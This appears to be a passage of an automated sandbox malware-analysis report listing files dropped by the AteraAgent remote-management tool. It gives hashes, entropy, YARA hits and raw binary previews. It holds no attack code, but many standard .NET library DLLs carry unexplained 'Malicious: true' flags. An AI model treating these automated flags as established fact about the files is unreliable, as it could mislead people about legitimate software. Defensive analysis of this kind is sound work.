                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@..................................(..O....@..4...............((...`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.826916157243993
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:dFz0Q6gcqRhcsMWdMW+kNyb8E9VF6IYijSJIVx9JtGHa:dFz1c60EEpYi60LCa
                                                                                                                                                                                                                                                                                              MD5:5CB31F305FA31BBBDE93598B09341AD2
                                                                                                                                                                                                                                                                                              SHA1:3AADCDA2D6A06E01B1D95EA72F54E3DB162F7F50
                                                                                                                                                                                                                                                                                              SHA-256:77C01CBE120119813044E7E4D1E07960099387A3887B3CF7B03438D7A79C6282
                                                                                                                                                                                                                                                                                              SHA-512:8FA8099E5AB4256317E75A70BA658CA3F401A26EBC062588A805402EA0DC0CB9F1BB55839B0F00A17A04E70EE1A206E75337EDD0B5C11643D0351655DED11337
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................X.....@.................................L(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16424
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.7212625286101515
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:a6xWA3W4aW/NWQvNyb8E9VF6IYijSJIVxIJgxDJ:aaB/TEpYi60PDJ
                                                                                                                                                                                                                                                                                              MD5:F3BCDE298AE95A6686C51C1533D13DC6
                                                                                                                                                                                                                                                                                              SHA1:6DF2A0B078E68523BB584FC6F5C4C17ACD6DC14D
                                                                                                                                                                                                                                                                                              SHA-256:763EB552EF818E397C692FA1F076F569DECACDC7CA31689B4AE2FBE897163CD1
                                                                                                                                                                                                                                                                                              SHA-512:69528981A1C8684045347F6C600F7CAB9A41FD568606AFD9BC20AE0F958B225C51545E472507556DB3849E4E8DB9C7EEA1568E2DDE0C6209B8721A2EAAE89305
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ....................................@..................................+..O....@..................((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73256
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954346769832472
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nwn:B7N1r9KGI04CCAskwwn
                                                                                                                                                                                                                                                                                              MD5:084E3B8ADA8BF97176D8A84E0B2FC539
                                                                                                                                                                                                                                                                                              SHA1:76D7CF8DC99FF5C83D01A540BED2E3516968B113
                                                                                                                                                                                                                                                                                              SHA-256:8F5B110565A224BA914908A2AE8823350253474C9ADF1CC0D06A92671A9AE002
                                                                                                                                                                                                                                                                                              SHA-512:882577C020B22B7FC841862D92A601C645F0249AD597498E5A99557B910244D43CAC74966A396A3BE2469FC503C20F0810C846A52386F8286A38AAF3D924D716
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......B.....@.....................................O.... ..P...............((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853650060576054
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Kr97WquW6/Nyb8E9VF6IYijSJIVxkp9ij:KRJKDEpYi60eQ
                                                                                                                                                                                                                                                                                              MD5:D91F97304DD898E07554CE01739E9C78
                                                                                                                                                                                                                                                                                              SHA1:45D9D0F0522A1097563AB220C10BD228E313B80E
                                                                                                                                                                                                                                                                                              SHA-256:9F5AEA9AF29F645C417EC03D8EDE29040461242C77C70E17F89C3DBF2F2207DD
                                                                                                                                                                                                                                                                                              SHA-512:67BF4FA43ABB88E3B21B7E39D6527250D0020F7A08D0121313A1402F7C7BC6EB25F9FFE434B7B546761B7DD333937A0C7D26C8343D07B180F8C6035A6EC2C83D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ....................................@.................................\+..O....@..................((...`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.792826561587803
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:F16eWLDWGoNyb8E9VF6IYijSJIVx4nWtt3:H6LbAEpYi60FtR
                                                                                                                                                                                                                                                                                              MD5:0C0D34408ECF8E9B3D72C004CF780C8B
                                                                                                                                                                                                                                                                                              SHA1:01FFD4CA2B40E5722CC33D5E224DD129C6D7F6E8
                                                                                                                                                                                                                                                                                              SHA-256:25289211A3653876FB4B69849866BBE0E9F98FA2772929BA8042832EBED94082
                                                                                                                                                                                                                                                                                              SHA-512:FC8E4AF721E32A4851529BBDD73E4EB3CF21C160F448FFA4A23828726C288B2ABEEBD9CFDA4390A9911A4EAE1D46C6A2FC6B1314816928C5A8163D406C1779C8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ...............................s....@.................................|*..O....@..................((...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.785088378774488
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:x8G4YC2W+wW8WpwWU4Nyb8E9VF6IYijSJIVxP7/:+GZ5OwEpYi60j
                                                                                                                                                                                                                                                                                              MD5:B11A1EDFB7BF4F8641D9BDBDEFE01361
                                                                                                                                                                                                                                                                                              SHA1:A51FE13BF202E6E7CD3464B0F09258ED6A7FAA37
                                                                                                                                                                                                                                                                                              SHA-256:B82CF7C934C3F91733944171AE4E3E4DCAE53CE6A46EACE871E7BA010CCE9171
                                                                                                                                                                                                                                                                                              SHA-512:287A62789ACD80A7691F337EE9E8080A000E75B46CBA9E1466E047F8AF4F4B8578502E04C21423C1097B82A3381626797E07DBC80FF7C4E294AF0177567008C6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ....................................@.................................z+..O....@..x...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.9002603008267265
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:J6ziqTEkGWvRWH1Nyb8E9VF6IYijSJIVxKPTk:JYT1cREpYi600w
                                                                                                                                                                                                                                                                                              MD5:9E80A264FEFC33F67734AEE3676A91CA
                                                                                                                                                                                                                                                                                              SHA1:3D9EE94141B96C33640F529CFFDFECCFA09111F6
                                                                                                                                                                                                                                                                                              SHA-256:DBE2FF30D10C66A9BF4591A13EC9C07B02D7EC97743C875144505136A4D1DBBA
                                                                                                                                                                                                                                                                                              SHA-512:B2D6AD370724EC0B7E7B6B3CF8BEC7426DD80A3115F73052ABFF13A4159E0BDCC2F7D62DC0164B8300CB695408DAC56C428B1B1C9B825D710E9249CBA0A6FFB6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@..................((...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.810145599200941
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:0Uv7c7iWNCWq0Nyb8E9VF6IYijSJIVxIL59:0M7c1m0EpYi600X
                                                                                                                                                                                                                                                                                              MD5:18791F51B30C35E1854C9A8D29646DE0
                                                                                                                                                                                                                                                                                              SHA1:FFFA650CF69699835CF76CC56B943D038488FD76
                                                                                                                                                                                                                                                                                              SHA-256:05C243E6C5261F112792260F708F2A473E5A2E79B3E022CE525F097751B850F4
                                                                                                                                                                                                                                                                                              SHA-512:557FEE73D55EA194D12E845AA92F1FAFA86FAEABBD2D38321664350733F4EAADAC5A5827D08247FE6EAF07B2FE58760097B8B40988054C5946A88231FCD578AC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ..............................i.....@..................................*..O....@..................((...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):15912
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.853949257369427
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:1+vxmNWnRW5TPMNyby2sE9jBF6IYiYF85S35IVnxGUHF8C8n8Q3M:ISWnRWJ0Nyb8E9VF6IYijSJIVxIAQ3M
                                                                                                                                                                                                                                                                                              MD5:3B6EAFCA26AAC70CAC6C873EF5623AF6
                                                                                                                                                                                                                                                                                              SHA1:C3F0ACDDF6193F59B6FD4A467B5EDD6A0F7E9771
                                                                                                                                                                                                                                                                                              SHA-256:2F7DC5A3678E01C11E5B06153CEF63C7638BF7DC8A9EA6E2B9EADCBAF947709F
                                                                                                                                                                                                                                                                                              SHA-512:50CDB22F27529279486A1C7B84E6F4C3770A89A6455C86E9B09407D386DE8E280BF605897766A7D67E5CACA6C4CD7E112BBDBE3EE290370B8BC0115082EE991B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... ..............................:(....@.................................L+..O....@..$...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):92712
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.483787905211059
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/2Ec05j4eAH64rh5fSt5T9nFcI94WYG76v:+lK4eA7mDmWYGA
                                                                                                                                                                                                                                                                                              MD5:EEA74039309D9480AB49CABD8D2F5B1B
                                                                                                                                                                                                                                                                                              SHA1:21A94EED07C9EC10B98DE07A6884D30568C5061F
                                                                                                                                                                                                                                                                                              SHA-256:9710540DDF8CC6CD092612892115D0D539A853B856BA1BB694EAA3719A663A39
                                                                                                                                                                                                                                                                                              SHA-512:5DA9C32494BA499F8F409C7DC6FF1661F1E6635022C90FDA64DABC9297102D693843C8E39BD38E693980342FFDBFF972A526722AF75BA130140DA3917D9788DC
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ....................................@..................................U..O....`..,............B..((........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3025099
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999917825476981
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:49152:L/snUpmkynQXrqb091jbpTsZOprMnuzM9HFNX/F8J5fSz+ukPo5O08iDw5ip54FG:LWU0QXOb091RJrL43WYxTM08iDfMo
                                                                                                                                                                                                                                                                                              MD5:108BC29224053A4735170BCB644CC73C
                                                                                                                                                                                                                                                                                              SHA1:9A4B8929E890443DC8204FCCBF4BDB6C6C853A3E
                                                                                                                                                                                                                                                                                              SHA-256:7C7C62702B5A6CA58084C1EC776116D1A7D697D7A104F2BB705676088C8614C8
                                                                                                                                                                                                                                                                                              SHA-512:883D76DD6B1395BB545461EC0A88CF797524F922E8787ABB27CA681ED72FE75C57732C5E17C7181509F98242871B7AFC0398F69D7B04A043EDC21B57DC88482A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-......b.Y...?........?...AgentPackageProgramManagement/AgentPackageProgramManagement.exe....(.......}o.........}_...q.~.D.R.7Gp..G.(..'..._^Yb.8....b-.x..ck+.N.dT..8.D!...N.6=n...D.....w`..T.=_./D.|..])LnQ.c(......p..o..L_m...h.S.h.:z?2.+...z.......Y....!I~.+&V,{.<(."?.{.=.E..i..:+.j.<..p..q.f:......d(F..7.s%;...M.,R.k....K\d.o3..........vNtG..B..._G9Y....S.....m.....gh....Otm.j!M-n..t.m.&.(8..On.wvy..N-.y.....Dr......w..UY.N.r.......k.`...-....!,.&..B..]T...,.5.....m.'z....V.].i..3v..|.........\$...Z.Y$...8...#..:...kU]....g...R...g.U..R.(....A....7.f9........L..M...C.E........].KE..Q.(.vo.0..nF_....9K..,.1"....i..-........_..._.....Q.....C.]gp..u.X.?.......b...,..Io6/ ...[...>.,.m..s..._...L......j.:..u:...J...i...j..n{[#...~5....<?=Fg.n..~c..k8...w.....^p...F.9....b.....~..DK4.6.@`..z...ZY.....zh...I.>#.....nA[...t.m_./..Z...{. -$.z.&.6. .Q..%./........1.V........<..:...<_vQ.1G.z0(.N.;.B"h.....Zo.]"..e.k.b.1...k...c.O.*..?V..J.d.|..(..].1C\....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):57896
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.173653035778126
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:RJZ9Gx/x4S7IRyh+ngOBF31+ywIsybxluYL6uKjxtYcFm7B6K+EEpYi60Ttc:RJXA3ogMF+KTbxWuwhm7Bl+976b
                                                                                                                                                                                                                                                                                              MD5:CB9890B01A396F64D702AD10F441003A
                                                                                                                                                                                                                                                                                              SHA1:44C086CE6BB8078E252F41F5BECC1CB650FF2F33
                                                                                                                                                                                                                                                                                              SHA-256:1A7194E86B266261501B7ED1AD3EA13FE73DFEEDDCD1BA884894A0155BDBE2EA
                                                                                                                                                                                                                                                                                              SHA-512:6CEA4A2E31BD33CC13A9F5EA4D162B75BED863DB2569B0ED46C7389F3BCDBA3333CDDDCF2EA83C95CE3678458796D4A476F151705CF256E0F4EDBA6CD1CAC952
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bg.........."...0.................. ........@.. ....................... ......;P....`.....................................O.......................((........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......HR..Dn...........................................................~....(....-..*.(....,..*(....~....(....(.....l(....(....*...0..3.......~....(....-.(...+*~....(.....(.....(....o....(...+*..0...........(.....~.....( ...*..0...........(.....~.....( ...*..0...........(....(......(!...*2.(....(....*v~....(....-.~"...*~....(....*...0...........(#....(.....o$...(%...*.0..g.......(&....('....o$......o(....s).......+......O...r...p(*...o+...&...X......i2..o,...o-........,..o.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1251
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.000868036244702
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdszvPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3sB7iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                              MD5:16D1DF732FB7C3FE51EE9657C5AC458C
                                                                                                                                                                                                                                                                                              SHA1:32CECF6AA8A03E11A967D54C67F9404F6A73D57B
                                                                                                                                                                                                                                                                                              SHA-256:4FC493DA952DF0968311A06FAC3A5D03FBC2351DB77D0D907A1FAFA4ADA08777
                                                                                                                                                                                                                                                                                              SHA-512:1F33ADA48F1ECAFA9238B87A8743C0A92953D123A917E38EC9F7EA7B92A7514AF6F244E4E3F77141D9ABDC11D120641FBDE9318525E0C3F2DC16F6E1D91634C9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <asse

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.ini

                                                                                                                                                                                                                                                                                              Download File
